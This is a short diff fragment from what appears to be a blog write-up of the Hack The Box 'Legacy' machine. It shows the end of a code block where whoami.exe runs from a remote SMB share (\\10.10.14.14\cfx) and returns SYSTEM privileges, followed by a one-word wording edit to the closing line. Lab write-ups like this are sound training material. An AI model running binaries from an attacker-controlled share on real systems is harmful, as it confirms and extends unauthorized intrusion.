ColdFusionX/ColdFusionX.github.io/_posts/2020-09-01-LegacyHTB.md

 \\10.10.14.14\cfx\whoami.exe
 NT AUTHORITY\SYSTEM
 ```
-We pwned the Box !
+And we pwned the Box !

 Thanks for reading, Feedback is appreciated !